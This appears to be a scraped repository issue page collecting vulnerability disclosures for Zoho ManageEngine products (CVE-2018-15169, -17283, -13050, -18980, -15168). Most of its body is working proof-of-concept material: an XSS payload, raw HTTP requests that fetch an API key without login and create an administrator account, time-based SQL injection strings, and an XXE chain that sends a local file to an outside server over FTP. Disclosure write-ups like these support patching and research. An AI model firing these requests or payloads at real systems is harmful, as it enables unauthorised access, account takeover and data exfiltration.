forcve's People
forcve's Issues
[CVE-2018-15169]Zoho manageengine Applications Manager Reflected XSS
Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS
Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE:CVE-2018-15169
I found a Reflected XSS in the Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET
request.
Proof of Concept
/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=
Notice: This vul can reproduce without login.
The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
CVE-2020-14882
[CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
Firewall Analyzer 12.3 Build 123183 has permission bypass Vulnerability which can lead to information disclosure and SQL injection
Proof of Concept:
Getting the apikey unauthorizedly:
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
Add the admin user by only using the apikey poc:
POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&[email protected]&privilege=Administrator&[email protected]&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close
-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="password"
test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"
undefined
-----------------------------195342410120122--
Sql injection by only using the apikey poc:
POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
name=KcP7OGhC';select%20pg_sleep(1);%20--
[CVE-2018-13050]Zoho manageengine Applications Manager SQL Injection vulnerability
Zoho manageengine Applications Manager SQL Injection vulnerability
Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-13050
Proof of Concept:
POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=
This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.
Databases:
User:
Table:
data:
[CVE-2018-18980]Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.
My vps’s evil.xml
<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;
I used the Ftp protocol to read file, it can read the file c:\test.txt.
The test.txt is just for test.
Then i used the poc to request my vps’s evil.xml.
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>
The vulnerability exists in the /devices/ProcessRequest.do?RequestID=463&RequestXML=
,so i tested it by the poc which was urlencoded.
http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E
In my vps ,i used the python script to open ftp protocol for accepting data
When i sent the request , I accepted the content of test.txt in my vps.
[CVE-2018-15168]Zoho manageengine Applications Manager SQL Injection vulnerability
Zoho manageengine Applications Manager SQL Injection vulnerability
Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE:CVE-2018-15168
I found a sql injection in the Zoho ManageEngine Applications Manager 13 (13810 build) via the resids parameter in /editDisplaynames.domethod=editDisplaynames&resids=1
GET request.
Proof of Concept:
GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: close
This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.
The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
CVE-2020-11527
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.